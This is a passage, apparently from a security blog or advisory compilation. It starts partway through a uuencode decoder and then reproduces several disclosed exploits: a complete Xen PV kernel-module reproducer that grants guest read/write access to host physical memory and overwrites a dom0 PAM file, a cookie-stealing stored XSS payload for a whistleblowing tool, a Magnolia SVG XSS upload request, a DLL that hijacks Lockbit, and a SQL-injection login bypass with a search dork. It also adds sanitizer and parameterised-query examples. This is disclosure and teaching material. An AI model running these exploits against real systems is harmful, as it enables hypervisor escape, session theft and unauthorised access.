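    needed = (n + 2) // 3 * 4            # four input chars per three output bytes
    data = line[1:]
    if len(data) < needed:
        if strict:
            raise ValueError(f"length byte {line[0]:#04x} declares {n} bytes "
                             f"({needed} chars) but only {len(data)} chars follow")
        data = data + b"`" * (needed - len(data))   # '`' decodes to a zero sextet
    out = bytearray()
    for i in range(0, needed, 4):
        a, b, c, d = ((ch - 0x20) & 0x3F for ch in data[i:i + 4])
        out.append((a << 2) | (b >> 4))
        out.append(((b & 0x0F) << 4) | (c >> 2))
        out.append(((c & 0x03) << 6) | d)
    return bytes(out[:n])


def decode_uu_body(lines, strict: bool = True):
    """Decode the lines between 'begin' and 'end'. Returns (data, findings):
    in strict mode an over-long claim is reported and the line skipped, so
    nothing is ever read past the end of a line."""
    out, findings = bytearray(), []
    for lineno, line in enumerate(lines, 1):
        if line.startswith(b"begin "):
            continue
        if line == b"end":
            break
        if not line or uu_line_length(line) == 0:   # blank or '`' terminator
            continue
        try:
            out += decode_uu_line(line, strict)
        except ValueError as exc:
            findings.append(f"line {lineno}: {exc}")
    return bytes(out), findings


# The body from the report's mbox; bytes([0x9F]) stands in for each <9f> marker.
SAMPLE_BODY = [
    b"begin 644 test",
    bytes([0x9F]),
    rb'''M2&5L;&\L"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU''',
    rb'''M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*"@H*''',
    bytes([0x9F]),
    rb'''54&QE87-E(')E<&QY+`I4879I<RX*''',
    b"`",
    b"end",
]

if __name__ == "__main__":
    text, problems = decode_uu_body(SAMPLE_BODY)
    print(text.decode())
    for p in problems:
        print("rejected:", p)
```

Strict mode yields the 111 bytes of Tavis's message and two findings; lenient mode yields 237 bytes with 126 zeros where the garbage would have been. Either is safe; what a decoder must never do is let the length byte alone decide how far to index into the line buffer.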
<pre><code>Xen: PV guest on non-SELFSNOOP CPUs can validate non-coherent L2 pagetable<br /><br />[I'm not sure whether there are any major users of (unshimmed) Xen PV left, but https://xenbits.xen.org/docs/unstable/support-matrix.html says it's still a security-supported use case for 64-bit guests.]<br /><br />[Tested on Debian's Xen version 4.14.4-pre (Debian 4.14.3+32-g9de3671772-1~deb11u1)]<br /><br />On CPUs without SELFSNOOP support (which I think essentially means "AMD CPUs" nowadays?), a Xen PV domain that has access to a PCI device (which grants the domain the ability to set arbitrary cache attributes on all its pages) can trick Xen into validating an L2 pagetable that contains a cacheline that is marked as clean in the cache but actually differs from main memory. After the pagetable has been validated, an attacker can flush the "clean" cacheline, such that on the next load, unvalidated data from main memory shows up in the pagetable.<br /><br />The L2 pagetable validation path (promote_l2_table()) can be attacked with this because for zeroed PTEs, it only reads and doesn't write. The L1 pagetable validation path (promote_l1_table()) seems to always write to memory in the C code, but the compiler could conceivably elide that write, making the attack possible against that path, too - I haven't checked what compilers actually do there. Thinking further, it might also be a good idea to check the Memory Sharing code, although that isn't security-supported anyway.<br /><br />(The same attack might also be possible without a PCI device if an HVM/PVH domain is collaborating with the PV domain - from what I can tell, HVM/PVH can always control their cache attributes, and pages with incoherent cache state could then be freed to Xen's page allocator and reallocated by the PV domain, unless opt_scrub_domheap is set?)<br /><br />I made a little reproducer that can be loaded as a kernel module inside a PV guest with PCI passthrough. 
It gives you a new device /dev/physical_memory using which you can just read and write all physical memory. For example, you can scan around for interesting strings:<br /><br /><br />root@pv-guest:~/incoherent_page_table# strings -20 -td /dev/physical_memory<br />[...]<br />146006071 auth requisite pam_nologin.so<br />146006107 # Load environment from /etc/environment and ~/.pam_environment<br />146006171 session required pam_env.so readenv=1<br />146006214 session required pam_env.so readenv=1 envfile=/etc/default/locale<br />146006286 @include common-auth<br />146006308 -auth optional pam_gnome_keyring.so<br />146006346 @include common-account<br /><br /><br />Looking at that closer, we can dump the whole page and see that it looks like a pagecache page of a PAM config file from dom0:<br /><br /><br />root@pv-guest:~/incoherent_page_table# dd if=/dev/physical_memory bs=1 count=4096 skip=146006016<br />#%PAM-1.0<br /><br /># Block login if they are globally disabled<br />auth requisite pam_nologin.so<br />[...]<br /><br /><br />Then we can clobber it by just dd'ing into it:<br /><br /><br />root@pv-guest:~/incoherent_page_table# echo -n '##CLOBBER##' | dd of=/dev/physical_memory bs=1 seek=146006046<br />11+0 records in<br />11+0 records out<br />11 bytes copied, 0.00109982 s, 10.0 kB/s<br />root@pv-guest:~/incoherent_page_table# <br /><br /><br />And checking from a dom0 shell, the file contents of this config file in dom0 have indeed changed:<br /><br /><br />root@jannh-amdbox:/home/user# head -n5 /etc/pam.d/lightdm<br />#%PAM-1.0<br /><br /># Block login if th##CLOBBER##ally disabled<br />auth requisite pam_nologin.so<br /><br />root@jannh-amdbox:/home/user# <br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. 
Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2022-06-06.<br /><br /><br /><br /><br /><br />====== Reproducer code ======<br />root@pv-guest:~/incoherent_page_table# cat incoherent_page_table.c<br />#include <linux/module.h><br />#include <linux/kernel.h><br />#include <linux/vmalloc.h><br />#include <linux/set_memory.h><br />#include <linux/mm.h><br />#include <linux/miscdevice.h><br />#include <asm/cacheflush.h><br />#include <asm/tlbflush.h><br />#include <asm/io.h><br />#include <asm/xen/hypercall.h><br />#include <asm/xen/page.h><br /><br />/* first entry in the last L3 pagetable */<br />#define MAPPING_TARGET_ADDR 0xffffff8000000000UL<br /><br />static unsigned long *controlled_l1_pte;<br /><br />static void __tlb_flush_everything_local(void *info)<br />{<br />	__flush_tlb_all();<br />}<br /><br />static void tlb_flush_everything(void)<br />{<br />	on_each_cpu(__tlb_flush_everything_local, NULL, 1);<br />}<br /><br />static ssize_t physmem_rw(char __user *buf, size_t len, loff_t *offp, int is_write)<br />{<br />	ssize_t ret = len;<br />	while (len != 0) {<br />		unsigned long offset_in_page = (*offp) & 0xfff;<br />		size_t chunk_len = min_t(size_t, len, 0x1000 - offset_in_page);<br />		void *mapped_addr = (void*)(MAPPING_TARGET_ADDR + offset_in_page);<br /><br />		pr_warn("physmem_rw() iteration: len=%lu, off=%lu, chunk_len=%lu\n", (unsigned long)len, (unsigned long)*offp, (unsigned long)chunk_len);<br /><br />		if (signal_pending(current))<br />			return -ERESTARTSYS;<br /><br />		WRITE_ONCE(*controlled_l1_pte, ((unsigned long)(*offp) & ~0xfffUL) | _PAGE_PRESENT | _PAGE_RW | _PAGE_USER);<br />		tlb_flush_everything();<br /><br />		if (is_write) {<br />			*(volatile char *)mapped_addr = 0; // for debugging<br />			if (copy_from_user(mapped_addr, buf, chunk_len))<br />				ret = -EFAULT;<br />		} else {<br />			*(volatile char *)mapped_addr; // for debugging<br />			if (copy_to_user(buf, mapped_addr, chunk_len))<br />				ret = -EFAULT;<br />		}<br /><br />		WRITE_ONCE(*controlled_l1_pte, 0);<br />		tlb_flush_everything();<br /><br />		buf += chunk_len;<br />		len -= chunk_len;<br />		(*offp) += chunk_len;<br />	}<br />	return ret;<br />}<br /><br />static ssize_t physmem_read(struct file *file, char __user *buf, size_t len, loff_t *offp)<br />{<br />	return physmem_rw(buf, len, offp, 0);<br />}<br /><br />static ssize_t physmem_write(struct file *file, const char __user *buf, size_t len, loff_t *offp)<br />{<br />	return physmem_rw((char __user *)buf, len, offp, 1);<br />}<br /><br />static loff_t my_llseek(struct file *file, loff_t offset, int whence) {<br />	switch (whence) {<br />	case SEEK_CUR:<br />		offset += file->f_pos;<br />		fallthrough;<br />	case SEEK_SET:<br />		file->f_pos = offset;<br />		return file->f_pos;<br />	default:<br />		return -EINVAL;<br />	}<br />}<br /><br />static const struct file_operations physmem_fops = {<br />	.owner = THIS_MODULE,<br />	.read = physmem_read,<br />	.write = physmem_write,<br />	.llseek = my_llseek<br />};<br /><br />static struct miscdevice physmem_miscdev = {<br />	.minor = MISC_DYNAMIC_MINOR,<br />	.name = "physical_memory",<br />	.fops = &physmem_fops<br />};<br /><br />static struct page *incoherent_page;<br /><br />static int init_test(void) {<br />	struct page *bogo_l1_page_table;<br />	void *wc_mapping;<br />	pte_t *linear_mapping_ptep;<br />	int level;<br />	pgd_t *pgd = pgd_offset(current->mm, MAPPING_TARGET_ADDR);<br />	p4d_t *p4d = p4d_offset(pgd, MAPPING_TARGET_ADDR);<br />	pud_t *pud = pud_offset(p4d, MAPPING_TARGET_ADDR);<br />	int update_res;<br />	struct mmu_update mmu_update_req;<br /><br />	pr_warn("starting incoherent_page_table test\n");<br />	pr_warn("old pud: 0x%lx\n", *(unsigned long *)pud);<br />	if (*(unsigned long *)pud != 0) {<br />		pr_warn("refusing to clobber existing pte\n");<br />		return -EBUSY;<br />	}<br /><br />	/* allocate a zeroed page, and create a WC mapping of it in vmalloc space */<br />	incoherent_page = alloc_page(GFP_KERNEL | __GFP_ZERO | __GFP_NOFAIL);<br />	wc_mapping = vmap(&incoherent_page, 1, 0, pgprot_writecombine(PAGE_KERNEL));<br />	if (!wc_mapping) {<br />		pr_warn("vmap() failed\n");<br />		return -EFAULT;<br />	}<br /><br />	/* allocate a zeroed L1 pagetable (but don't tell Xen we're going to use it<br />	 * that way)<br />	 */<br />	bogo_l1_page_table = alloc_page(GFP_KERNEL | __GFP_ZERO | __GFP_NOFAIL);<br />	controlled_l1_pte = page_address(bogo_l1_page_table);<br /><br />	/* reset Xen's internal mapping of the page to normal */<br />	set_pages_uc(incoherent_page, 1);<br />	set_pages_wb(incoherent_page, 1);<br /><br />	/* make sure the page's first line is cached but not dirty */<br />	clflush_cache_range(page_address(incoherent_page), PAGE_SIZE);<br />	*(volatile char *)page_address(incoherent_page);<br />	mb();<br /><br />	/* THIS IS WHERE THE MAGIC HAPPENS:<br />	 * sneak past the cache and put a PTE in the page<br />	 */<br />	*(pmd_t*)wc_mapping = __pmd((virt_to_machine(controlled_l1_pte).maddr | _PAGE_TABLE));<br />	mb();<br /><br />	/* get rid of all our writable mappings */<br />	vunmap(wc_mapping);<br />	linear_mapping_ptep = lookup_address((unsigned long)page_address(incoherent_page), &level);<br />	if (level != PG_LEVEL_4K) {<br />		pr_warn("level != PG_LEVEL_4K\n");<br />		return -EFAULT;<br />	}<br />	set_pte(linear_mapping_ptep, pte_wrprotect(*linear_mapping_ptep));<br /><br />	/* Let Xen validate the incoherently clean cache contents.<br />	 * We rely on Xen only *reading* the entries for validating them, not writing<br />	 * them back.<br />	 * Don't use set_pud() here because we want to see the return value.<br />	 */<br />	mmu_update_req.ptr = virt_to_machine(pud).maddr | MMU_NORMAL_PT_UPDATE;<br />	mmu_update_req.val = virt_to_machine(page_address(incoherent_page)).maddr | _PAGE_TABLE;<br />	update_res = HYPERVISOR_mmu_update(&mmu_update_req, 1, NULL, DOMID_SELF);<br /><br />	pr_warn("load 1: 0x%lx\n", *(unsigned long *)page_address(incoherent_page));<br />	clflush_cache_range(page_address(incoherent_page), PAGE_SIZE);<br />	pr_warn("load 2: 0x%lx\n", *(unsigned long *)page_address(incoherent_page));<br /><br />	pr_warn("mmu_update returned %d\n", update_res);<br />	if (update_res < 0)<br />		return -EUCLEAN;<br /><br />	if (misc_register(&physmem_miscdev)) {<br />		pr_warn("misc_register failed\n");<br />		return -EFAULT;<br />	}<br /><br />	pr_warn("enjoy your physical memory read/write!\n");<br />	pr_warn("controlled_l1_pte = 0x%lx\n", (unsigned long)controlled_l1_pte);<br />	return 0;<br />}<br /><br />static void exit_test(void) {<br />	misc_deregister(&physmem_miscdev);<br />	WRITE_ONCE(*controlled_l1_pte, virt_to_machine(page_address(incoherent_page)).maddr | _PAGE_PRESENT | _PAGE_RW | _PAGE_USER);<br />	tlb_flush_everything();<br />	*(unsigned long *)(MAPPING_TARGET_ADDR) = 0;<br />	tlb_flush_everything();<br />}<br /><br />module_init(init_test);<br />module_exit(exit_test);<br />MODULE_LICENSE("GPL v2");<br />root@pv-guest:~/incoherent_page_table# cat Makefile<br />KDIR ?= /lib/modules/`uname -r`/build<br /><br />default:<br />	$(MAKE) -C $(KDIR) M=$$PWD<br />root@pv-guest:~/incoherent_page_table# <br /><br />Related CVE Numbers: CVE-2022-26364.<br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
<pre><code>EQS Integrity Line: Multiple Vulnerabilities<br /><br /> Name Multiple Vulnerabilities in EQS Integrity Line<br /> Systems Affected EQS Integrity Line through 2022-07-01<br /> Severity High<br /> Impact (CVSSv3) High 8.8/10, score: (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)<br /> Vendor EQS Group AG (https://www.eqs.com/)<br /> Advisory http://www.ush.it/team/ush/advisory-eqs-integrity-line/eqs_integrity_line.txt<br /> Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)<br /> Date 20220706<br /><br />I. BACKGROUND<br /><br />EQS Integrity Line is a proprietary whistleblowing software which enables<br />employees to report misconduct such as corruption, abuses of power and<br />discrimination internally before complaints become public and, in serious<br />cases, result in financial losses as well as reputational damage.<br /><br />II. DESCRIPTION<br /><br />Multiple vulnerabilities exist in the EQS Integrity Line software.<br /><br />The present advisory highlights two distinct vulnerabilities, namely (A)<br />XSS Vulnerability (stored) [CVE-2022-34007] and (B) Use of GET Request<br />Method With Sensitive Query Strings [CWE-598].<br /><br />III. 
ANALYSIS<br /><br />A) XSS Vulnerability (stored) [CVE-2022-34007]<br /><br />EQS Integrity Line through 2022-07-01 allows a stored XSS via a crafted<br />whistleblower entry.<br /><br />No account on the whistleblowing software is required to exploit this<br />vulnerability.<br /><br />The vulnerability resides in the whistleblowing questionnaire<br />implementation, which lets anonymous, unauthenticated users inject<br />malicious XSS vectors because of missing or improper input sanitization.<br />A Content Security Policy (CSP) that could prevent or limit the attack<br />is also absent.<br /><br />The vulnerability is present on the whistleblowing form, and can be<br />triggered using the following example input:<br /><br />--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--<br /><br /><img src= onerror=alert(document.cookie)><br /> <br />--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--<br /><br />Due to the vulnerability, an attacker posing as a whistleblower could<br />submit an XSS vector through the submission form; the stored payload is<br />then executed in the context of the browser session of the recipient of<br />the submission, typically an Anticorruption Officer or an Internal<br />Auditor.<br /><br />Being able to execute code in the context of the target, and due to the<br />absence of additional mitigations (e.g. 
the HttpOnly flag for cookies)<br />the attacker could obtain a copy of the target's session cookie, use it<br />to impersonate and operate in place of the target user, and execute<br />automated operations on their behalf: reading all the reports present<br />on the system, or compromising its integrity by deleting reports or<br />interfering with ongoing communications with a real whistleblower.<br /><br />In short: a standard XSS attack scenario.<br /><br />The test for the presence of this vulnerability has been performed on the<br />first input only, so as not to risk damaging the application. A complete<br />audit of the application for this class of vulnerability is advised.<br /><br />The vulnerability was first identified during an independent security<br />audit of the EU Sanctions Whistleblower Tool of the European Commission,<br />which enables whistleblowers to report possible violations of EU sanctions<br />and is hosted at:<br /><br />https://eusanctions.integrityline.com/<br /> <br />B) Use of GET Request Method With Sensitive Query Strings [CWE-598]<br /><br />EQS Integrity Line through 2022-07-01 leaves sensitive traces in the browser<br />history of whistleblowers using the application and possibly in the logs<br />of other network appliances involved in the communication.<br /><br />When a whistleblower makes a submission, the system assigns a unique<br />identifier to the submission and lets the whistleblower choose a PIN; the<br />two are used together to log back in and communicate with the recipients<br />of the report.<br /><br />The session implementation passes the unique identifier as a GET variable<br />in the navigated URL used to access the report.<br />Such an implementation is prone to sensitive information leakage, making it<br />possible for an 
auditor accessing the browser history of the<br />whistleblower's device to clearly identify the evidence of a performed<br />submission.<br /><br />It is advised to perform full review of the application to get sure that<br />the application reduces the sensible traces left in the browser history of<br />the user.<br /><br />IV. WORKAROUND<br /><br />The vendor has fixed the XSS and implemented a CSP in date 2022-07-01<br /><br />V. CVE INFORMATION<br /><br />XSS Vulnerability (stored) [CVE-2022-34007]<br />Use of GET Request Method With Sensitive Query Strings [CWE-598]<br /><br />VI. DISCLOSURE TIMELINE<br /><br />20220617 USH: Bugs discovered<br />20220617 USH: Contacted Mitre for CVE Assignment<br />20220621 USH: First vendor contact (Lorenzo Trevisiol, Laura Santeusanio)<br />20220622 USH: Advisory provided to the vendor (Goran Kozomara)<br />20220701 Vendor response: XSS confirmed and CSP implemented (Marco Ermini)<br /> The vendor does not acknowledge the second reported vulnerability<br /> in the specific context of use but has planned future improvement<br /> the application of the application replacing the GET request with<br /> a POST request.<br />20220701 USH: The team confirms prompt and effective remediation of the<br /> XSS vulnerability but points out suboptimal CSP implementation.<br /> The implementation seems to involve a central proxy or device and<br /> to always include a list of 10 vendor clients and other third<br /> parties CDN probably used for other reasons different from the<br /> audited integrity line app (e.g. bootstrap CDN). The team advises<br /> to implement a policy per-site and app to avoid listing sensible<br /> resources and limit any possible exposure.<br />20220701 Advisory release scheduled for 20220706<br />20220706 Advisory released<br /><br />VII. REFERENCES<br /><br />[1] EQS Integrity Line: Multiple Vulnerabilities<br /> http://www.ush.it/team/ush/advisory-eqs-integrity-line/eqs_integrity_line.txt<br /><br />VIII. 
CREDIT<br /><br />Giovanni Pellerano, is credited with the discovery of this vulnerability.<br /><br />Giovanni Pellerano<br />web site: http://www.ush.it/<br />mail: evilaliv3@ush.it<br /><br />IX. LEGAL NOTICES<br /><br />Copyright (c) 2022 Giovanni Pellerano<br /><br />Permission is granted for the redistribution of this alert<br />electronically. It may not be edited in any way without mine express<br />written consent. If you wish to reprint the whole or any<br />part of this alert in any other medium other than electronically,<br />please email me for permission.<br /><br />Disclaimer: The information in the advisory is believed to be accurate<br />at the time of publishing based on currently available information. Use<br />of the information constitutes acceptance for use in an AS IS condition.<br />There are no warranties with regard to this information. Neither the<br />author nor the publisher accepts any liability for any direct, indirect,<br />or consequential loss or damage arising from use of, or reliance on,<br />this information.<br /><br /></code></pre>
<pre><code># Exploit Title: Magnolia CMS <= 6.2.19 - Stored Cross-Site Scripting (XSS)
# Date: 08/05/2022
# Exploit Author: Giulio Garzia 'Ozozuz'
# Vendor Homepage: https://www.magnolia-cms.com/
# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip
# Version: 6.2.19
# Tested on: Linux, Windows, Docker
# CVE : CVE-2022-33098

Explanation
A malicious user with permission to upload a profile picture for a contact can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource.

===== REQUEST =====
POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908
Content-Length: 620
Connection: close
Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

-----------------------------399178799522967017241464837908
Content-Disposition: form-data; name="140_file"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert('POC - Magnolia CMS');
  </script>
</svg>

-----------------------------399178799522967017241464837908--
</code></pre>
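The root cause of the Magnolia finding is that an SVG is an XML document, so it can carry script elements and event-handler attributes while still being accepted as an "image" and served inline from the application origin. As an added example, not part of the advisory and not Magnolia's own code, the stdlib-only Python function below shows the server-side check an upload handler can apply: it parses the file as XML, refuses anything whose root is not svg, strips script-bearing elements, on* event attributes and javascript:/data: URLs, and reports what it removed so the upload can be logged or rejected. The sample document is the advisory's xss.svg payload reconstructed inline; the function name and the element and attribute deny-lists are my own choices.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Register prefixes so the cleaned document serialises with a plain default
# xmlns rather than ElementTree's generated ns0: prefixes.
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Assumed deny-list: elements that execute script or embed foreign (HTML) content.
DANGEROUS_ELEMENTS = {"script", "foreignobject", "iframe", "object", "embed"}
# URL-carrying attributes; a javascript:/data: value here is script execution
# or a navigation to attacker content. data: is blocked deliberately (strict).
URL_ATTRIBUTES = {"href"}
UNSAFE_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(qname):
    """Strip ElementTree's {namespace} prefix and normalise case."""
    return qname.rsplit("}", 1)[-1].lower()


def _strip_elements(parent, removed):
    """Recursively drop dangerous elements (and their whole subtree)."""
    for child in list(parent):
        name = _local(child.tag)
        if name in DANGEROUS_ELEMENTS:
            parent.remove(child)
            removed.append("element:" + name)
        else:
            _strip_elements(child, removed)


def sanitize_svg(data):
    """Parse an uploaded SVG and return (cleaned_xml, removed_items).

    Raises ValueError if the document is not an SVG at all. An empty
    removed_items list means nothing on the deny-list was present.
    """
    root = ET.fromstring(data)  # expat does not fetch the external DTD
    if _local(root.tag) != "svg":
        raise ValueError("root element is not svg")

    removed = []
    _strip_elements(root, removed)
    # Second pass: event handlers and script-scheme URLs on what is left.
    for elem in root.iter():
        for key, value in list(elem.attrib.items()):
            name = _local(key)
            if name.startswith("on"):
                del elem.attrib[key]
                removed.append("attribute:" + name)
            elif name in URL_ATTRIBUTES and value.strip().lower().startswith(UNSAFE_SCHEMES):
                del elem.attrib[key]
                removed.append("attribute:" + name)
    return ET.tostring(root, encoding="unicode"), removed


# Constructed sample: the advisory's xss.svg payload, reproduced inline.
SAMPLE_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert('POC - Magnolia CMS');</script>
</svg>"""

if __name__ == "__main__":
    cleaned, removed = sanitize_svg(SAMPLE_SVG)
    print("removed:", removed)
    print(cleaned)
```

Rejecting the upload outright whenever the removed list is non-empty is the stricter policy. Either way, a deny-list sanitizer is only one layer: user-supplied SVGs should also be served from a separate origin or with a Content-Disposition of attachment and a restrictive Content-Security-Policy, or be rasterised on upload, so that a missed vector cannot run in the viewer's session.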
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/38745539b71cf201bb502437f891d799_B.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Ransom Lockbit 3.0
Vulnerability: Code Execution
Description: The ransomware apparently now requires a password to execute, as noted by "@vxunderground", e.g. "-pass db66023ab2abcb9957fb01ed50cdfa6a". Lockbit looks for and executes DLLs in its current directory. Therefore, we can hijack a vulnerable DLL, in this case "RstrtMgr.dll", execute our own code and terminate the malware pre-encryption. The exploit DLL checks if the current directory is "C:\Windows\System32"; if not, we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.
Family: Lockbit
Type: PE32
MD5: 38745539b71cf201bb502437f891d799
Vuln ID: MVID-2022-0621
Disclosure: 07/04/2022
Video PoC URL: https://www.youtube.com/watch?v=tAXrRcsnzjY

Exploit/PoC:
1) Compile the following C code as "RstrtMgr.dll"
2) Place the DLL in the same directory as Lockbit 3.0
3) Optional - Hide it: attrib +s +h "RstrtMgr.dll"
4) Run Lockbit 3.0 {04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe -k LocalServiceNetworkRestricted -pass db66023ab2abcb9957fb01ed50cdfa6a


#include "windows.h"
#include "string.h"   /* strcmp */

//By malvuln - 7/4/2022
//Purpose: RCE in Lockbit 3.0 ransomware
//MD5: 38745539b71cf201bb502437f891d799
//gcc -c RstrtMgr.c -m32
//gcc -shared -o RstrtMgr.dll RstrtMgr.o -m32
//Note: assumes a non-UNICODE build, where TCHAR is char and the narrow
//MessageBox / GetCurrentDirectory / strcmp calls below line up.
/** DISCLAIMER:
Author is NOT responsible for any damages whatsoever by using this software or improper malware
handling. By using this code you assume and accept all risk implied or otherwise.
**/
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
    switch (reason) {
    case DLL_PROCESS_ATTACH: {
        MessageBox(NULL, "Ransom Lockbit 3.0 aka LockShit\nPWNED by Malvuln", "Code Exec PoC", MB_OK);
        TCHAR buf[MAX_PATH];
        // Only act when loaded from a directory other than System32, i.e. when
        // the loader picked this copy up ahead of the real RstrtMgr.dll.
        if (GetCurrentDirectory(MAX_PATH, buf))
            if (strcmp("C:\\Windows\\System32", buf) != 0) {
                // Terminate the host process (the ransomware) before it encrypts.
                // GetCurrentProcessId() replaces the original getpid(), which
                // needed a CRT header the file did not include.
                HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, GetCurrentProcessId());
                if (NULL != handle) {
                    TerminateProcess(handle, 0);
                    CloseHandle(handle);
                }
            }
        break;
    }
    }
    return TRUE;
}


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
<pre><code>====================================================================================================================================
| # Title : Advanced Testimonials Manager v5.6 Auth bypass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |
| # Vendor : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194 |
| # Dork : Advanced Testimonial Manager |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] Use payload : user & pass = ' or 1=1 limit 1 -- -+

[+] http://127.0.0.1/testimonials/admin/index.php

==Greetings to :=========================================================================================================================
| |
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet |
| |
=========================================================================================================================================
</code></pre>
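The payload in this PoC only works when the login query is assembled by pasting the submitted username and password into the SQL text: the quote closes the string literal, the OR makes the WHERE clause true for every row, LIMIT 1 returns the first account, and the comment marker discards the rest of the query including the password check. As an added example, not the product's code, the following Python/sqlite3 script puts a login written that way next to the parameterised form and runs the advisory's payload through both: the concatenated query lets it in, while the bound-parameter query treats the payload as an ordinary, non-matching username. The table, column names and the admin credentials are constructed for the demo, and the plaintext password column exists only to keep the example short; a real application stores a salted password hash.

```python
import sqlite3

# Constructed in-memory schema and account for the demo.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE admin_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
conn.execute("INSERT INTO admin_users (username, password) VALUES ('admin', 'correct-horse-battery')")
conn.commit()


def login_concat(username, password):
    """Vulnerable pattern: user input becomes part of the SQL text."""
    sql = (
        "SELECT username FROM admin_users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(username, password):
    """Fixed pattern: the SQL text is constant and the values travel as bound
    parameters, so quotes, OR and comment markers in the input are just data."""
    sql = "SELECT username FROM admin_users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# The advisory's payload, submitted as both username and password.
PAYLOAD = "' or 1=1 limit 1 -- -+"

if __name__ == "__main__":
    print("concatenated query :", login_concat(PAYLOAD, PAYLOAD))  # admin
    print("parameterised query:", login_param(PAYLOAD, PAYLOAD))   # None
    print("valid credentials  :", login_param("admin", "correct-horse-battery"))  # admin
```

Parameterisation is the fix that removes the bug class rather than the one payload; input filtering of quotes or keywords is not a substitute. The same pattern applies to PHP's PDO or mysqli prepared statements, which is where a codecanyon PHP application of this kind would implement it.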